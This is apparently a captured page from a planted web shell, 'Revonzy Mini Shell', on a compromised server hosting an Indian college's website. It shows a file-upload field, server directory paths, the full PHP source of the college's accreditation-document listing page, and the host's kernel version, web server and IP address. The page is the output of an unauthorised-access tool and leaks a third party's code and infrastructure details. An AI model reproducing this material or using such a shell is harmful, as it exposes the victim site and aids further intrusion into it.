Revonzy Mini Shell

Revonzy Mini Shell

Şuanki Dizin: /home/wwwdreamtechnolo/public_html/lbpmsolapur.org/
Dosya Yükle :
Şuanki Dosya : /home/wwwdreamtechnolo/public_html/lbpmsolapur.org/qualitative-quantative-index.php

<!--
	Powered By - Dream Technology, Solapur.
	Contact No : +91 9595775120
	Email ID - dream.technology@outlook.com
-->
<?php
	require_once("admin/lib/functions.php");
	$db = new login_function();
?>	

<DOCTYPE html>
<html>
<head>
<link href="css/style.css" rel="stylesheet" type="text/css" media="all" />
    
	<title>Laxmibai Bhaurao Patil Mahila Mahavidyalaya</title>
	<link rel="stylesheet" type="text/css" href="css/stylesheet.css"/>
	<style>

	.tab_data
	{
		background:#E91546;
		font-weight:bold;
		font-size:16px;
		color:white;
		border-right:1px solid black;
	}
	tr td
	{
		padding:10px;
		border:1px solid black;
		text-align:center;
	}
	th 
	{
		padding:10px;
	}
	</style>
	
</head>
<body>	
	
	<?php
		require_once("lib/header.php");
	?>
		
	<div name="tab_container">
		<div class="main_container" style="min-height:1000px;">
		
		<div class="page_highlighter" style="background:orange">AQAR Documents</div>
			
			<?php
				require_once("highlights.php");
			?>
		<div class="data_container" style="margin-top:10px; min-height:700px;">
		<div>
	
	<h1 style="font-size:30px; text-align:center;">AQAR Documents</h1>
	<br /><br />
<style>
.main_cover
{
    
}
.main_year
{
    background-color:#FFE5D4;
    padding:10px;
    font-size:25px;
    font-weight:bold;
    border:1px solid #B8BAD7;
    margin-top:25px;
    cursor:pointer;
}
.display_main_contents
{
    border:1px solid #B0B3D8;
    background-color:#F3F3F3;
    width:100%;
    display:none;
}
.title_of_aqar
{
    padding:10px;
    font-size:17px;
    background-color:#e6e6ff;
    font-weight:bold;
    margin-top:25px;
}
</style>
<?php
function table_head_data()
{
?>
    <table cellspacing='0' style="margin:0px;width:100%; background-color:#FFFFFF">
	<thead>
		<tr style="background:#E91546">
			<th width="20" class="tab_data">Sr.No</th>
			<th width="40" class="tab_data" >Serial No</th>
			<th width="150" class="tab_data">Title</th>
			<th width="30" class="tab_data">View</th>
		</tr>
	</thead>
	<tbody>
<?php
}

function table_foot_data()
{
?>
</tbody>
</table>
<?php
}

function no_data_available()
{
    ?>	
    <div style="text-align:center; background-color:#FFFFFF; padding:10px;">
        No data available
    </div>
    <?php
}
?>
	<?php
			$select_data	=	array();
			$select_data	=	$db->get_unique_qualitative_quantitative_details();
			
			if(!empty($select_data))
			{
			    $first_array_val = $select_data[0];
			    $second_array_val = $select_data[1];
			    
			    $select_data[0] =   $second_array_val;
			    $select_data[1] =   $first_array_val;
			    
				$counter = 0;
				foreach($select_data as $record)
				{
					$year           =   $record;
			?>
<div class="main_year" id="mainyear_<?php echo $counter; ?>"><?php echo $year; ?></div>
    <div class="display_main_contents" id="main_contents_<?php echo $counter; ?>" style="padding:25px; width:93%;">
     <?php
		  if($year=="AQAR Documents 2019-20")
		  {
		      $select_data	=	array();
			$select_data	=	$db->get_details($year);
			
			if(!empty($select_data))
			{
			    
			    ?>
			    
			  <table cellspacing='0' style="margin:0px;width:100%; background-color:#FFFFFF">
            	<thead>
            		<tr style="background:#E91546">
            			<th width="20" class="tab_data">Sr.No</th>
            			<th width="40" class="tab_data" >Serial No</th>
            			<th width="150" class="tab_data">Title</th>
            			<th width="30" class="tab_data">View</th>
            		</tr>
            	</thead>
            	<tbody>
			    
			    <?php
			    
				$counter = 0;
				foreach($select_data as $record)
				{
					$res_id			=	$record[0];
					$table			=	$record[1];
					$serial_no		=	$record[2];
					$title			=	$record[3];
					$cfile			=	$record[4];
					$date			=	$record[5];
					$time			=	$record[6];
					$sequence       =   $record[7];
					$year           =   $record[8];
					
					if($table=="one")
					{
			?>
                        <tr>
                            <td><?php echo $counter+1; ?></td>	
                            <!--<td style="text-align:left"><?php echo $year; ?></td>-->
                            <td style="text-align:left"><?php echo $serial_no; ?></td>
							<td style="text-align:left"><?php echo $title; ?></td>
							<td><a href="admin/images/<?php echo $cfile; ?>" target="_blank">View</a></td>
						</tr>							
						<?php
						$counter++;
					}
						}
						
						?>
						
						</table>
						
						<?php
					}
					else
					{
				        no_data_available();
					}
		  }
		  else if($year=="AQAR Documents 2020-21")
		  {
		      $select_data	=	array();
			$select_data	=	$db->get_details($year);
			
			if(!empty($select_data))
			{
			    
			    ?>
			    
			  <table cellspacing='0' style="margin:0px;width:100%; background-color:#FFFFFF">
            	<thead>
            		<tr style="background:#E91546">
            			<th width="20" class="tab_data">Sr.No</th>
            			<th width="40" class="tab_data" >Serial No</th>
            			<th width="150" class="tab_data">Title</th>
            			<th width="30" class="tab_data">View</th>
            		</tr>
            	</thead>
            	<tbody>
			    
			    <?php
			    
				$counter = 0;
				foreach($select_data as $record)
				{
					$res_id			=	$record[0];
					$table			=	$record[1];
					$serial_no		=	$record[2];
					$title			=	$record[3];
					$cfile			=	$record[4];
					$date			=	$record[5];
					$time			=	$record[6];
					$sequence       =   $record[7];
					$year           =   $record[8];
					
					if($table=="one")
					{
			?>
                        <tr>
                            <td><?php echo $counter+1; ?></td>	
                            <!--<td style="text-align:left"><?php echo $year; ?></td>-->
                            <td style="text-align:left"><?php echo $serial_no; ?></td>
							<td style="text-align:left"><?php echo $title; ?></td>
							<td><a href="admin/images/<?php echo $cfile; ?>" target="_blank">View</a></td>
						</tr>							
						<?php
						$counter++;
					}
						}
						
						?>
						
						</table>
						
						<?php
					}
					else
					{
				        no_data_available();
					}
		  }
		  /*if($year=="2020-21" OR $year=="2019")
		  {
		  	$select_data	=	array();
			$select_data	=	$db->get_details($year);
			
			if(!empty($select_data))
			{
			    
			    ?>
			    
			  <table cellspacing='0' style="margin:0px;width:100%; background-color:#FFFFFF">
            	<thead>
            		<tr style="background:#E91546">
            			<th width="20" class="tab_data">Sr.No</th>
            			<th width="40" class="tab_data" >Serial No</th>
            			<th width="150" class="tab_data">Title</th>
            			<th width="30" class="tab_data">View</th>
            		</tr>
            	</thead>
            	<tbody>
			    
			    <?php
			    
				$counter = 0;
				foreach($select_data as $record)
				{
					$res_id			=	$record[0];
					$table			=	$record[1];
					$serial_no		=	$record[2];
					$title			=	$record[3];
					$cfile			=	$record[4];
					$date			=	$record[5];
					$time			=	$record[6];
					$sequence       =   $record[7];
					$year           =   $record[8];
					
					if($table=="one")
					{
			?>
                        <tr>
                            <td><?php echo $counter+1; ?></td>	
                            <!--<td style="text-align:left"><?php echo $year; ?></td>-->
                            <td style="text-align:left"><?php echo $serial_no; ?></td>
							<td style="text-align:left"><?php echo $title; ?></td>
							<td><a href="admin/images/<?php echo $cfile; ?>" target="_blank">View</a></td>
						</tr>							
						<?php
						$counter++;
					}
						}
						
						?>
						
						</table>
						
						<?php
					}
					else
					{
				        no_data_available();
					}	
					
		    }*/
		    else
		    {
		        $select_data	=	array();
			    $select_data	=	$db->get_details($year);
			    
			if(!empty($select_data))
			{
			    $tab_0_counter = 0;
			    $tab_1_counter = 0;
			    $tab_2_counter = 0;
			    $tab_3_counter = 0;
			    $tab_4_counter = 0;
			    $tab_5_counter = 0;
			    $tab_6_counter = 0;
			    $tab_7_counter = 0;
			    
			    $table_0_data   =   array();
				$table_1_data   =   array();
				$table_2_data   =   array();
				$table_3_data   =   array();
				$table_4_data   =   array();
				$table_5_data   =   array();
				$table_6_data   =   array();
				$table_7_data   =   array();
			    
				$counter = 0;
				foreach($select_data as $record)
				{
					$res_id			=	$record[0];
					$table			=	$record[1];
					$serial_no		=	$record[2];
					$title			=	$record[3];
					$cfile			=	$record[4];
					$date			=	$record[5];
					$time			=	$record[6];
					$sequence       =   $record[7];
					$year           =   $record[8];
					
					if($table==0)
					{
					    $table_0_data[$tab_0_counter][0]   =   $serial_no;
					    $table_0_data[$tab_0_counter][1]   =   $title;
					    $table_0_data[$tab_0_counter][2]   =   $cfile;
					    $table_0_data[$tab_0_counter][3]   =   $sequence;
					    
					    $tab_0_counter++;
					}
					else if($table==1)
					{
					    $table_1_data[$tab_1_counter][0]   =   $serial_no;
					    $table_1_data[$tab_1_counter][1]   =   $title;
					    $table_1_data[$tab_1_counter][2]   =   $cfile;
					    $table_1_data[$tab_1_counter][3]   =   $sequence;
					    
					    $tab_1_counter++;
					}
					else if($table==2)
					{
					    $table_2_data[$tab_2_counter][0]   =   $serial_no;
					    $table_2_data[$tab_2_counter][1]   =   $title;
					    $table_2_data[$tab_2_counter][2]   =   $cfile;
					    $table_2_data[$tab_2_counter][3]   =   $sequence;
					    
					    $tab_2_counter++;
					}
					else if($table==3)
					{
					    $table_3_data[$tab_3_counter][0]   =   $serial_no;
					    $table_3_data[$tab_3_counter][1]   =   $title;
					    $table_3_data[$tab_3_counter][2]   =   $cfile;
					    $table_3_data[$tab_3_counter][3]   =   $sequence;
					    
					    $tab_3_counter++;
					}
					else if($table==4)
					{
					    $table_4_data[$tab_4_counter][0]   =   $serial_no;
					    $table_4_data[$tab_4_counter][1]   =   $title;
					    $table_4_data[$tab_4_counter][2]   =   $cfile;
					    $table_4_data[$tab_4_counter][3]   =   $sequence;
					    
					    $tab_4_counter++;
					}
					else if($table==5)
					{
					    $table_5_data[$tab_5_counter][0]   =   $serial_no;
					    $table_5_data[$tab_5_counter][1]   =   $title;
					    $table_5_data[$tab_5_counter][2]   =   $cfile;
					    $table_5_data[$tab_5_counter][3]   =   $sequence;
					    
					    $tab_5_counter++;
					}
					else if($table==6)
					{
					    $table_6_data[$tab_6_counter][0]   =   $serial_no;
					    $table_6_data[$tab_6_counter][1]   =   $title;
					    $table_6_data[$tab_6_counter][2]   =   $cfile;
					    $table_6_data[$tab_6_counter][3]   =   $sequence;
					    
					    $tab_6_counter++;
					}
					else if($table==7)
					{
					    $table_7_data[$tab_7_counter][0]   =   $serial_no;
					    $table_7_data[$tab_7_counter][1]   =   $title;
					    $table_7_data[$tab_7_counter][2]   =   $cfile;
					    $table_7_data[$tab_7_counter][3]   =   $sequence;
					    
					    $tab_7_counter++;
					}
					
					/*
					if($table=="one")
					{
			?>
                        <tr>
                            <td><?php echo $counter+1; ?></td>	
                            <td style="text-align:left"><?php echo $year; ?></td>
                            <td style="text-align:left"><?php echo $serial_no; ?></td>
							<td style="text-align:left"><?php echo $title; ?></td>
							<td><a href="admin/images/<?php echo $cfile; ?>" target="_blank">View</a></td>
						</tr>							
						<?php
						$counter++;
					}*/
						}
						
						?>
					<div class="title_of_aqar">
					    EXTENDED PROFILE
					</div>	
						<?php
						if(!empty($table_0_data))
						{
						    table_head_data();
						    
						    $countr_n = 0;
						    foreach($table_0_data as $record)
            				{
            					$serial_no		=	$record[0];
            					$title			=	$record[1];
            					$cfile			=	$record[2];
            					$sequence       =   $record[3];
            			?>
                        <tr>
                            <td><?php echo $countr_n+1; ?></td>	
                            <td style="text-align:left"><?php echo $serial_no; ?></td>
							<td style="text-align:left"><?php echo $title; ?></td>
							<td><a href="admin/images/<?php echo $cfile; ?>" target="_blank">View</a></td>
						</tr>							
						<?php		
						        $countr_n++;
            				}
            				table_foot_data();
						}
						else
						{
						     no_data_available();
						}
						
						
						?>
					<div class="title_of_aqar">
					    CRITERION 1 – CURRICULAR ASPECTS
					</div>	
						<?php
						if(!empty($table_1_data))
						{
						    table_head_data();
						    
						    $countr_n = 0;
						    foreach($table_1_data as $record)
            				{
            					$serial_no		=	$record[0];
            					$title			=	$record[1];
            					$cfile			=	$record[2];
            					$sequence       =   $record[3];
            			?>
                        <tr>
                            <td><?php echo $countr_n+1; ?></td>	
                            <td style="text-align:left"><?php echo $serial_no; ?></td>
							<td style="text-align:left"><?php echo $title; ?></td>
							<td><a href="admin/images/<?php echo $cfile; ?>" target="_blank">View</a></td>
						</tr>							
						<?php		
						        $countr_n++;
            				}
            				table_foot_data();
						}
						else
						{
						     no_data_available();  
						}
						
						?>
					<div class="title_of_aqar">
					    CRITERION 2 - TEACHING- LEARNING AND EVALUATION
					</div>	
						<?php
						if(!empty($table_2_data))
						{
						    table_head_data();
						    $countr_n = 0;
						    foreach($table_2_data as $record)
            				{
            					$serial_no		=	$record[0];
            					$title			=	$record[1];
            					$cfile			=	$record[2];
            					$sequence       =   $record[3];
            			?>
                        <tr>
                            <td><?php echo $countr_n+1; ?></td>	
                            <td style="text-align:left"><?php echo $serial_no; ?></td>
							<td style="text-align:left"><?php echo $title; ?></td>
							<td><a href="admin/images/<?php echo $cfile; ?>" target="_blank">View</a></td>
						</tr>							
						<?php		
						        $countr_n++;
            				}
            				
            				table_foot_data();
						}
						else
						{
						     no_data_available(); 
						}
						?>
					<div class="title_of_aqar">
					    CRITERION 3 - RESEARCH, INNOVATIONS AND EXTENSION
					</div>	
						<?php
						if(!empty($table_3_data))
						{
						    table_head_data();
						    
						    $countr_n = 0;
						    foreach($table_3_data as $record)
            				{
            					$serial_no		=	$record[0];
            					$title			=	$record[1];
            					$cfile			=	$record[2];
            					$sequence       =   $record[3];
            			?>
                        <tr>
                            <td><?php echo $countr_n+1; ?></td>	
                            <td style="text-align:left"><?php echo $serial_no; ?></td>
							<td style="text-align:left"><?php echo $title; ?></td>
							<td><a href="admin/images/<?php echo $cfile; ?>" target="_blank">View</a></td>
						</tr>							
						<?php		
						        $countr_n++;
            				}
            				
            				table_foot_data();
						}
						else
						{
						     no_data_available();  
						}
						
						?>
					<div class="title_of_aqar">
					    CRITERION 4 - INFRASTRUCTURE AND LEARNING RESOURCES
					</div>	
						<?php
						if(!empty($table_4_data))
						{
						    table_head_data();
						    
						    $countr_n = 0;
						    foreach($table_4_data as $record)
            				{
            					$serial_no		=	$record[0];
            					$title			=	$record[1];
            					$cfile			=	$record[2];
            					$sequence       =   $record[3];
            			?>
                        <tr>
                            <td><?php echo $countr_n+1; ?></td>	
                            <td style="text-align:left"><?php echo $serial_no; ?></td>
							<td style="text-align:left"><?php echo $title; ?></td>
							<td><a href="admin/images/<?php echo $cfile; ?>" target="_blank">View</a></td>
						</tr>							
						<?php		
						        $countr_n++;
            				}
            				table_foot_data();
						}
						else
						{
						     no_data_available();
						}
						
						?>
					<div class="title_of_aqar">
					    CRITERION 5 - STUDENT SUPPORT AND PROGRESSION
					</div>	
						<?php
						if(!empty($table_5_data))
						{
						    table_head_data();
						    
						    $countr_n = 0;
						    foreach($table_5_data as $record)
            				{
            					$serial_no		=	$record[0];
            					$title			=	$record[1];
            					$cfile			=	$record[2];
            					$sequence       =   $record[3];
            			?>
                        <tr>
                            <td><?php echo $countr_n+1; ?></td>	
                            <td style="text-align:left"><?php echo $serial_no; ?></td>
							<td style="text-align:left"><?php echo $title; ?></td>
							<td><a href="admin/images/<?php echo $cfile; ?>" target="_blank">View</a></td>
						</tr>							
						<?php		
						        $countr_n++;
            				}
            				table_foot_data();
						}
						else
						{
						     no_data_available();  
						}
						
						?>
					<div class="title_of_aqar">
					    CRITERION 6- GOVERNANCE, LEADERSHIP AND MANAGEMENT
					</div>	
						<?php
						if(!empty($table_6_data))
						{
						    table_head_data();
						    
						    $countr_n = 0;
						    foreach($table_6_data as $record)
            				{
            					$serial_no		=	$record[0];
            					$title			=	$record[1];
            					$cfile			=	$record[2];
            					$sequence       =   $record[3];
            			?>
                        <tr>
                            <td><?php echo $countr_n+1; ?></td>	
                            <td style="text-align:left"><?php echo $serial_no; ?></td>
							<td style="text-align:left"><?php echo $title; ?></td>
							<td><a href="admin/images/<?php echo $cfile; ?>" target="_blank">View</a></td>
						</tr>							
						<?php		
						        $countr_n++;
            				}
            				table_foot_data();
						}
						else
						{
						     no_data_available();  
						}
						
						?>
					<div class="title_of_aqar">
					    CRITERION 7 – INSTITUTIONAL VALUES AND BEST PRACTICES
					</div>	
						<?php
						if(!empty($table_7_data))
						{
						    table_head_data();
						    
						    $countr_n = 0;
						    foreach($table_7_data as $record)
            				{
            					$serial_no		=	$record[0];
            					$title			=	$record[1];
            					$cfile			=	$record[2];
            					$sequence       =   $record[3];
            			?>
                        <tr>
                            <td><?php echo $countr_n+1; ?></td>	
                            <td style="text-align:left"><?php echo $serial_no; ?></td>
							<td style="text-align:left"><?php echo $title; ?></td>
							<td><a href="admin/images/<?php echo $cfile; ?>" target="_blank">View</a></td>
						</tr>							
						<?php		
						        $countr_n++;
            				}
            				
            				table_foot_data();
						}
						else
						{
						     no_data_available(); 
						}
						
					}
					else
					{
				?>				
					<tr>
						<td colspan="3">No data to list</td>
					</tr>
				<?php
					}	
		    }
			?>		
	            </div>

	<?php
						$counter++;
					}
				}
				else
				{
				?>				
					<tr>
						<td colspan="3">No data to list</td>
					</tr>
				<?php
				}				
				?>		

<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<script>
$(document).ready(function(){
    
    $('body').click(function() { 
        var id = event.target.id;
        
        if(id.indexOf('mainyear_') != -1){
            
            const myArray = id.split("_");
            var countr = myArray[1];
            
            $('#main_contents_'+countr).toggle("slide");
            return false; 
        }
    
    });
    
    $('#show').click(function() {
      $('.menu').toggle("slide");
    });
});
</script>
	
<!--<table cellspacing='0' style="margin:0px;width:100%" >
<thead>
		<tr style="background:#E91546">
			<th width="20" class="tab_data">Sr.No</th>
			<th width="30" class="tab_data">Year</th>
			<th width="30" class="tab_data">View</th>
		</tr>
	</thead>
	<tbody>
		  <?php
			$select_data	=	array();
			$select_data	=	$db->get_unique_qualitative_quantitative_details();
			
			if(!empty($select_data))
			{
				$counter = 0;
				foreach($select_data as $record)
				{
					$year           =   $record;
			?>
                        <tr>
                            <td><?php echo $counter+1; ?></td>	
                            <td style="text-align:left"><?php echo $year; ?></td>
							<td><a href="qualitative-quantative.php?year=<?php echo $year; ?>" target="_blank">View</a></td>
						</tr>							
						<?php
						$counter++;
					
						}
						
					}
					else
					{
				?>				
					<tr>
						<td colspan="3">No data to list</td>
					</tr>
				<?php
					}				
				?>		
	</tbody>
</table>-->

</div>	
	</div></div>	
				
			</div>
			<?php
		require_once("lib/footer.php");
	?>
</body>
</html>

EliteHackz.ORG
Revonzy Mini Shell
root@revonzy.com

Linux 65-254-81-4.cprapid.com 5.14.0-284.11.1.el9_2.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 9 05:49:00 EDT 2023 x86_64
Apache
65.254.81.4